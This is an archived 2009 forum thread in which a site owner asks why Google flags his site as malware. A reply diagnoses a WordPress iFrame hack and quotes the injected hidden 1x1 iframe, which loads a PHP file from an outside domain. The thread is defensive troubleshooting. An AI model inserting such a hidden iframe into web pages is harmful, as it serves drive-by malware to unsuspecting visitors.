PDA

View Full Version : Google has my site blocked for malware?!


Sedativechunk
01-01-2009, 12:19 AM
Okay, my retarded hosting company was paid for updating my domain name for another year, and instead of leaving my site alone, they took my domain name down for a day and put one of those advertising pages up. Well it just so happens that a google bot went to my site that day and blocked my site because one of the links on their advertising page was linked to malware. Now my site is blocked for malware. Here's the link to my site:
http://sedativechunk.com

It looks dumb and un-updated right now, but I was working on a new design for it showing some people what it looked like before, and they spotted it out. I wrote to Google monthes ago about fixing it and I guess they didn't.
How can I get my CLEAN website took off this blocked google list? I would never provide links for downloads to viruses, I am beyond ******* at my hosting company for doing this when they were paid on time for my domain name registration.

paul_norman_81
01-01-2009, 05:49 AM
Um, have you checked your source... Seems that Wordpress suffers from an iFrame hack (http://wordpress.org/support/topic/166902?replies=20)...

<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>

Google is simply protecting people... I would check your files and contact your host about it. There is a lot of info about this, Google is your friend!

Gauranga
01-01-2009, 11:34 PM
Your site contains a trojen, my virus scanner (webpages) picked up (avast).

Jenie0109
06-15-2009, 04:13 AM
oh no... trojans are scary... =(
hope my computer aint infected..